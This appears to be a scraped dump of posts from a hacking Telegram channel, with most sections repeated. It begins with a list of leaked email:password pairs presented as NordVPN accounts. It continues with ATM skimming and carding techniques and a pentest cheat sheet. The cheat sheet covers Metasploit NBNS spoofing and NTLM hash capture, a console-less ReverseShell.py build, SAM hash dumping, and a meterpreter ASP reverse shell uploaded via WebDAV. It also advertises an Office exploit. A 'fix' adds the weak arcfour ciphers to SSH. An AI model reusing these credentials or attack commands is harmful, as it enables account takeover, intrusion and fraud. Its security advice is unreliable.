π¦SOME VERIFIED PUBLIC NORDVPN PRE :
bportjoey@gmail.com:Frankie8904
armiechedon@gmail.com:derpderp5
thenykk@gmail.com:Slytherin5
mmuniz93@gmail.com:Manchester24
hugodewerra@gmail.com:Patchouli7
epbruen@gmail.com:Bugman01
jtarman20@gmail.com:Hooyah18
jackieguo0328@gmail.com:ghj33972
tipwow@yahoo.com:State123
sugiyamd@gmail.com:Andrew1997
mathis.knaepen@hotmail.com:Coco_101
stofferclc@gmail.com:Stoffer2005
jhollis_8@hotmail.com:nicholas1
otheswift@gmail.com:Peluchin1124
pooraggies247@gmail.com:Mklop1023
pierrick.ramin@gmail.com:fsx974pie
(not cracked by Us)
bportjoey@gmail.com:Frankie8904
armiechedon@gmail.com:derpderp5
thenykk@gmail.com:Slytherin5
mmuniz93@gmail.com:Manchester24
hugodewerra@gmail.com:Patchouli7
epbruen@gmail.com:Bugman01
jtarman20@gmail.com:Hooyah18
jackieguo0328@gmail.com:ghj33972
tipwow@yahoo.com:State123
sugiyamd@gmail.com:Andrew1997
mathis.knaepen@hotmail.com:Coco_101
stofferclc@gmail.com:Stoffer2005
jhollis_8@hotmail.com:nicholas1
otheswift@gmail.com:Peluchin1124
pooraggies247@gmail.com:Mklop1023
pierrick.ramin@gmail.com:fsx974pie
(not cracked by Us)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOP 7 WAYS- ILLEGAL HACKING $- BY BAD HACKERS :
First way
Often, scammers use devices that, when installed on an ATM, help them get information about the card. It can be special βnozzlesβ installed on the keyboard, which externally repeat the original buttons. In this case, the cardholder withdraws money from the account without any problems, but at the same time, the fake keyboard remembers all the keys pressed - of course, including the PIN code. Tip: carefully study the keyboard of an unfamiliar ATM before withdrawing money from your account.
Second way
Another device is what the English also call lebanese loops. These are plastic envelopes, the size of which is slightly larger than the size of the card - they are laid in the slot of the ATM. The owner of the credit card is trying to withdraw money, but the ATM cannot read the data from the magnetic strip. In addition, due to the design of the envelope, it is not possible to return the card. At this time, the attacker comes up and says that literally a day ago, the same thing happened to him. To return the card, you just need to enter the pin code and double-click Cancel. The cardholder tries, and, of course, nothing happens. He decides that the card has remained at the ATM, and leaves to contact the bank. The fraudster calmly takes out a credit card with an envelope using some simple means at hand. He already knows the pin code - the owner (now former) of "plastic" he himself introduced him in the presence of a swindler. The thief can only withdraw money from the account.
Third way
Itβs technically difficult, but you can intercept the data that the ATM sends to the bank in order to verify the availability of the requested amount of money in the account. To do this, fraudsters need to connect to the appropriate cable and read the necessary data. Considering that on the Internet the relevant instructions are easy to find in the public domain, and technological progress does not stand still, it can be argued: this option will be found more and more often.
The fourth way
In order to find out the pin code, some scammers leave a miniature video camera nearby. At the same time, they themselves are in the nearest car with a laptop, on the screen of which the numbers entered by the cardholder are visible. When entering a PIN code, cover your keyboard with your free hand.
Fifth way
Expensive, but one hundred percent faithful. There are times when fraudsters put their own βATMβ in a crowded place. True, for some reason it does not work and, naturally, does not give out any money. But it successfully reads all the necessary data from the card. And then it turns out that you already withdrew all the money from your account yesterday and for some reason do not want to remember this!
Sixth way
At one time, fraudsters from the UAE installed special devices in the holes for credit cards, which remembered all the data about the card inserted into the ATM. The cybercriminals could only peek at the pin code either in the first and fourth ways as described above, or simply peeping from behind. Well, the local native liked your ring, or your watch, or something else ...
Method Seven
> You canβt fight him. You can only put up. Nothing here depends on your attentiveness, caution or prudence. It happens that conspiracy with scammers are those people who get to your credit cards and so very simply: bank employees, for example. This happens very rarely, but no one is safe from such cases.
> But not only cardholders suffer. Large firms, shops, and banks also suffer. And here the losses are already calculated in the hundreds of thousands of dollars. And sometimes in millions.
>Specialists from law enforcement agencies in many countries of the world believe that crimes committed using plastic means of payment can be attributed to one of the most dangerous economic crimes. Moreover, they are committed not only in the computer banking system, but also through the Internet.
π¦TOP 7 WAYS- ILLEGAL HACKING $- BY BAD HACKERS :
First way
Often, scammers use devices that, when installed on an ATM, help them get information about the card. It can be special βnozzlesβ installed on the keyboard, which externally repeat the original buttons. In this case, the cardholder withdraws money from the account without any problems, but at the same time, the fake keyboard remembers all the keys pressed - of course, including the PIN code. Tip: carefully study the keyboard of an unfamiliar ATM before withdrawing money from your account.
Second way
Another device is what the English also call lebanese loops. These are plastic envelopes, the size of which is slightly larger than the size of the card - they are laid in the slot of the ATM. The owner of the credit card is trying to withdraw money, but the ATM cannot read the data from the magnetic strip. In addition, due to the design of the envelope, it is not possible to return the card. At this time, the attacker comes up and says that literally a day ago, the same thing happened to him. To return the card, you just need to enter the pin code and double-click Cancel. The cardholder tries, and, of course, nothing happens. He decides that the card has remained at the ATM, and leaves to contact the bank. The fraudster calmly takes out a credit card with an envelope using some simple means at hand. He already knows the pin code - the owner (now former) of "plastic" he himself introduced him in the presence of a swindler. The thief can only withdraw money from the account.
Third way
Itβs technically difficult, but you can intercept the data that the ATM sends to the bank in order to verify the availability of the requested amount of money in the account. To do this, fraudsters need to connect to the appropriate cable and read the necessary data. Considering that on the Internet the relevant instructions are easy to find in the public domain, and technological progress does not stand still, it can be argued: this option will be found more and more often.
The fourth way
In order to find out the pin code, some scammers leave a miniature video camera nearby. At the same time, they themselves are in the nearest car with a laptop, on the screen of which the numbers entered by the cardholder are visible. When entering a PIN code, cover your keyboard with your free hand.
Fifth way
Expensive, but one hundred percent faithful. There are times when fraudsters put their own βATMβ in a crowded place. True, for some reason it does not work and, naturally, does not give out any money. But it successfully reads all the necessary data from the card. And then it turns out that you already withdrew all the money from your account yesterday and for some reason do not want to remember this!
Sixth way
At one time, fraudsters from the UAE installed special devices in the holes for credit cards, which remembered all the data about the card inserted into the ATM. The cybercriminals could only peek at the pin code either in the first and fourth ways as described above, or simply peeping from behind. Well, the local native liked your ring, or your watch, or something else ...
Method Seven
> You canβt fight him. You can only put up. Nothing here depends on your attentiveness, caution or prudence. It happens that conspiracy with scammers are those people who get to your credit cards and so very simply: bank employees, for example. This happens very rarely, but no one is safe from such cases.
> But not only cardholders suffer. Large firms, shops, and banks also suffer. And here the losses are already calculated in the hundreds of thousands of dollars. And sometimes in millions.
>Specialists from law enforcement agencies in many countries of the world believe that crimes committed using plastic means of payment can be attributed to one of the most dangerous economic crimes. Moreover, they are committed not only in the computer banking system, but also through the Internet.
> According to some reports, today there are about 30 types of illegal card transactions through the World Wide Web. The most common of them - payment by non-existent cards, the creation of fake virtual stores, electronic theft, fake payment in gambling establishments.
> There was even a special term - carding. It is the illegal use of bank cards to purchase goods or services over the Internet. When doing carding, you can either get information about a real card, or generate all this data, but so that all systems will take a fake for a real one. Those interested can freely find links to sites that openly sell stolen credit cards. The standard price for a card is from 40 cents to 5 dollars. Most of the sellers are in the former USSR, buyers, on the contrary, are concentrated in the Far East, the victims are mainly citizens of the USA and Europe. According to the FBI, Ukraine and Russia have already earned a reputation as the countries where the most skilled hackers live.
> Virtual bazaars are arranged almost like real exchanges, prices fluctuate depending on demand. They are located on hacked pages and therefore are short-lived - most of these pages live only a couple of days. Experts agree that the center of global carding is St. Petersburg, where credit cards leave the counter in batches of 500-5000 pieces at a price of $ 1 per piece.
> Credit cards are obtained by breaking into large financial firms. For example, in 2003, after refusing to pay hackers money for silence, the well-known financial firm CD Universe admitted to losing a database of 300,000 cards. England alone lost 411 million pounds on carding in 2003. In 2005, this figure rose to a billion. Therefore, 25 million pounds were allocated to combat cybercrime.
enjoyβ€οΈππ»
USE FOR LEARN !!!!!!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
> There was even a special term - carding. It is the illegal use of bank cards to purchase goods or services over the Internet. When doing carding, you can either get information about a real card, or generate all this data, but so that all systems will take a fake for a real one. Those interested can freely find links to sites that openly sell stolen credit cards. The standard price for a card is from 40 cents to 5 dollars. Most of the sellers are in the former USSR, buyers, on the contrary, are concentrated in the Far East, the victims are mainly citizens of the USA and Europe. According to the FBI, Ukraine and Russia have already earned a reputation as the countries where the most skilled hackers live.
> Virtual bazaars are arranged almost like real exchanges, prices fluctuate depending on demand. They are located on hacked pages and therefore are short-lived - most of these pages live only a couple of days. Experts agree that the center of global carding is St. Petersburg, where credit cards leave the counter in batches of 500-5000 pieces at a price of $ 1 per piece.
> Credit cards are obtained by breaking into large financial firms. For example, in 2003, after refusing to pay hackers money for silence, the well-known financial firm CD Universe admitted to losing a database of 300,000 cards. England alone lost 411 million pounds on carding in 2003. In 2005, this figure rose to a billion. Therefore, 25 million pounds were allocated to combat cybercrime.
enjoyβ€οΈππ»
USE FOR LEARN !!!!!!
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run
[>] HTTP NTML Capture
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http
msf auxiliary(smb) > set SRVPORT 80
msf auxiliary(smb) > set URIPATH /
msf auxiliary(smb) > run
Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/
π¦Solution
The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before.
netbios
> Netbios, according to Microsoft, is no longer needed as of Windows 2000.
However, there are a few side effects.
One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially βdeprecatedβ NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you wonβt be able to establish a forest trust between two Windows Server 2003 forests.
But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations.
See below for step by step instructions on disabling Netbios on workstations:
π¦Windows XP, Windows Server 2003, and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties
In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows 7--8-10
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
enjoyβ€οΈππ»
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run
[>] HTTP NTML Capture
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http
msf auxiliary(smb) > set SRVPORT 80
msf auxiliary(smb) > set URIPATH /
msf auxiliary(smb) > run
Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/
π¦Solution
The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before.
netbios
> Netbios, according to Microsoft, is no longer needed as of Windows 2000.
However, there are a few side effects.
One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially βdeprecatedβ NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you wonβt be able to establish a forest trust between two Windows Server 2003 forests.
But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations.
See below for step by step instructions on disabling Netbios on workstations:
π¦Windows XP, Windows Server 2003, and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties
In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
π¦For Windows 7--8-10
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
enjoyβ€οΈππ»
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] Weak SSH Ciphers
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
> Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] Weak SSH Ciphers
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
> Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Pyinstaller linux
#FastTips
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
+ Generate the .spec file.
+ Windows: (You want a single EXE file with your data in it, hence --onefile).
python pyinstaller.py --onefile yourmainfile.py
+ Rebuild your package.
python pyinstaller.py yourmainfile.spec
+Look for your .exe or your .app bundle in the dist directory.
#FastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Pyinstaller linux
#FastTips
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
+ Generate the .spec file.
+ Windows: (You want a single EXE file with your data in it, hence --onefile).
python pyinstaller.py --onefile yourmainfile.py
+ Rebuild your package.
python pyinstaller.py yourmainfile.spec
+Look for your .exe or your .app bundle in the dist directory.
#FastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Pentesting tips :
Metasploit - spool /home/<username>/.msf3/logs/console.log
Save contents from each terminal!
Linux - script myoutput.txt # Type exit to stop
+ Disable network-manager
service network-manager stop
+ Set IP address
ifconfig eth0 192.168.50.12/24
+ Set default gateway
route add default gw 192.168.50.9
+ Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf
+ Show routing table
Windows - route print
Linux - route -n
+ Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9
+ Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0
+ Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
+ Python Shell
python -c 'import pty;pty.spawn("/bin/bash")'
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Pentesting tips :
Metasploit - spool /home/<username>/.msf3/logs/console.log
Save contents from each terminal!
Linux - script myoutput.txt # Type exit to stop
+ Disable network-manager
service network-manager stop
+ Set IP address
ifconfig eth0 192.168.50.12/24
+ Set default gateway
route add default gw 192.168.50.9
+ Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf
+ Show routing table
Windows - route print
Linux - route -n
+ Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9
+ Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0
+ Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
+ Python Shell
python -c 'import pty;pty.spawn("/bin/bash")'
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Internet Host/Network Enumeration
[+] WHOIS Querying
whois www.domain.com
[+] Resolve an IP using DIG
dig @8.8.8.8 securitymuppets.com
[+] Find Mail servers for a domain
dig @8.8.8.8 securitymuppets.com -t mx
[+] Find any DNS records for a domain
dig @8.8.8.8 securitymuppets.com -t any
[+] Zone Transfer
dig @192.168.100.2 securitymuppets.com -t axfr
host -l securitymuppets.com 192.168.100.2
nslookup / ls -d domain.com.local
[+] Fierce
fierce -dns <domain> -file <output_file>
fierce -dns <domain> -dnsserver <server>
fierce -range <ip-range> -dnsserver <server>
fierce -dns <domain> -wordlist <wordlist>
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Internet Host/Network Enumeration
[+] WHOIS Querying
whois www.domain.com
[+] Resolve an IP using DIG
dig @8.8.8.8 securitymuppets.com
[+] Find Mail servers for a domain
dig @8.8.8.8 securitymuppets.com -t mx
[+] Find any DNS records for a domain
dig @8.8.8.8 securitymuppets.com -t any
[+] Zone Transfer
dig @192.168.100.2 securitymuppets.com -t axfr
host -l securitymuppets.com 192.168.100.2
nslookup / ls -d domain.com.local
[+] Fierce
fierce -dns <domain> -file <output_file>
fierce -dns <domain> -dnsserver <server>
fierce -range <ip-range> -dnsserver <server>
fierce -dns <domain> -wordlist <wordlist>
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IP Network scanning
[+] ARP Scan
arp-scan 192.168.50.8/28 -I eth0
[+] NMAP Scans
[+] Nmap ping scan
sudo nmap βsn -oA nmap_pingscan 192.168.100.0/24 (-PE)
[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24
[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24
[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response
[+] Source port scanning
nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP))
Source port also doesn't work for OS detection.
[+] Speed settings
-n Disable DNS resolution
-sS TCP SYN (Stealth) Scan
-Pn Disable host discovery
-T5 Insane time template
--min-rate 1000 1000 packets per second
--max-retries 0 Disable retransmission of timed-out probes
[+] Netcat (swiss army knife)
# Connect mode (ncat is client) | default port is 31337
ncat <host> [<port>]
# Listen mode (ncat is server) | default port is 31337
ncat -l [<host>] [<port>]
# Transfer file (closes after one transfer)
ncat -l [<host>] [<port>] < file
# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [<host>] [<port>] < file
# Receive file
ncat [<host>] [<port>] > file
# Brokering | allows for multiple clients to connect
ncat -l --broker [<host>] [<port>]
# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [<host>] [<port>]
# Access control
ncat -l --allow <ip>
ncat -l --deny <ip>
# Proxying
ncat --proxy <proxyhost>[:<proxyport>] --proxy-type {http | socks4} <host>[<port>]
# Chat server | can use brokering for multi-user chat
ncat -l --chat [<host>] [<port>]
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IP Network scanning
[+] ARP Scan
arp-scan 192.168.50.8/28 -I eth0
[+] NMAP Scans
[+] Nmap ping scan
sudo nmap βsn -oA nmap_pingscan 192.168.100.0/24 (-PE)
[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24
[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24
[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response
[+] Source port scanning
nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP))
Source port also doesn't work for OS detection.
[+] Speed settings
-n Disable DNS resolution
-sS TCP SYN (Stealth) Scan
-Pn Disable host discovery
-T5 Insane time template
--min-rate 1000 1000 packets per second
--max-retries 0 Disable retransmission of timed-out probes
[+] Netcat (swiss army knife)
# Connect mode (ncat is client) | default port is 31337
ncat <host> [<port>]
# Listen mode (ncat is server) | default port is 31337
ncat -l [<host>] [<port>]
# Transfer file (closes after one transfer)
ncat -l [<host>] [<port>] < file
# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [<host>] [<port>] < file
# Receive file
ncat [<host>] [<port>] > file
# Brokering | allows for multiple clients to connect
ncat -l --broker [<host>] [<port>]
# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [<host>] [<port>]
# Access control
ncat -l --allow <ip>
ncat -l --deny <ip>
# Proxying
ncat --proxy <proxyhost>[:<proxyport>] --proxy-type {http | socks4} <host>[<port>]
# Chat server | can use brokering for multi-user chat
ncat -l --chat [<host>] [<port>]
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
Exploit Office 2016 using CVE-2018-0802 .pdf
332.4 KB
exploit office 2016 any user !!
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco/Networking Commands
? - Help
> - User mode
# - Privileged mode
router(config)# - Global Configuration mode
enable secret more secure than enable password.
For example, in the configuration command:
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
The password has been encrypted using the weak reversible algorithm.
enable - Change to privileged mode to view configs
config terminal/config t - Change to global config mode to modify
#show version - Gives you the router's configuration register (Firmware)
#show running-config - Shows the router, switch, or firewall's current configuration
#show ip route - show the router's routing table
#show tech-support - Dump config but obscure passwords
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco/Networking Commands
? - Help
> - User mode
# - Privileged mode
router(config)# - Global Configuration mode
enable secret more secure than enable password.
For example, in the configuration command:
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
The password has been encrypted using the weak reversible algorithm.
enable - Change to privileged mode to view configs
config terminal/config t - Change to global config mode to modify
#show version - Gives you the router's configuration register (Firmware)
#show running-config - Shows the router, switch, or firewall's current configuration
#show ip route - show the router's routing table
#show tech-support - Dump config but obscure passwords
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Remote Information Services
+ DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys:
auxiliary/gather/enumdns
use auxiliary/gather/dns...
[+] Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/fingerusers
+ NTP
Metasploit Auxiliarys
+ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice
[+] rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17
[+] RPC Services
rpcinfo -p
Endpointmapper metasploit
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Remote Information Services
+ DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys:
auxiliary/gather/enumdns
use auxiliary/gather/dns...
[+] Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/fingerusers
+ NTP
Metasploit Auxiliarys
+ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice
[+] rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17
[+] RPC Services
rpcinfo -p
Endpointmapper metasploit
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Web Services
+ WebDAV
Metasploit Auxiliarys
Upload shell to Vulnerable WebDAV directory:
msfpayload windows/meterpreter/reversetcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp
cadaver http://192.168.0.60/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt
Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt
[+] Nikto Web Scanner
# To scan a particular host
perl nikto.pl -host [host IP/name]
# To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]
# To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [outputfile]
# To use a proxy while scanning a host
perl nikto.pl -host host IP/name -useproxy proxy address
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Web Services
+ WebDAV
Metasploit Auxiliarys
Upload shell to Vulnerable WebDAV directory:
msfpayload windows/meterpreter/reversetcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp
cadaver http://192.168.0.60/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt
Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt
[+] Nikto Web Scanner
# To scan a particular host
perl nikto.pl -host [host IP/name]
# To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]
# To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [outputfile]
# To use a proxy while scanning a host
perl nikto.pl -host host IP/name -useproxy proxy address
β topic git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WHY WE SHOULD USE TCP CONNECTIONS ?
> What is 1 TCP connection
Before examining the structure of the TCP packet header, letβs figure out what 1 TCP connection is - this will help to more clearly understand what exactly we are analyzing in Wireshark and how many TCP connections we need to look for. For example, how many TCP connections are involved when opening 1 page of a website? A typical website consists of 1 page of HTML code, several pages of cascading style sheets for CSS and JavaScript files, as well as a couple of dozens of image files. So, to receive each of these files, a new TCP connection is created. For each of these connections, a three-stage handshake is performed - this is to the question of what costs, "overhead" TCP carries.
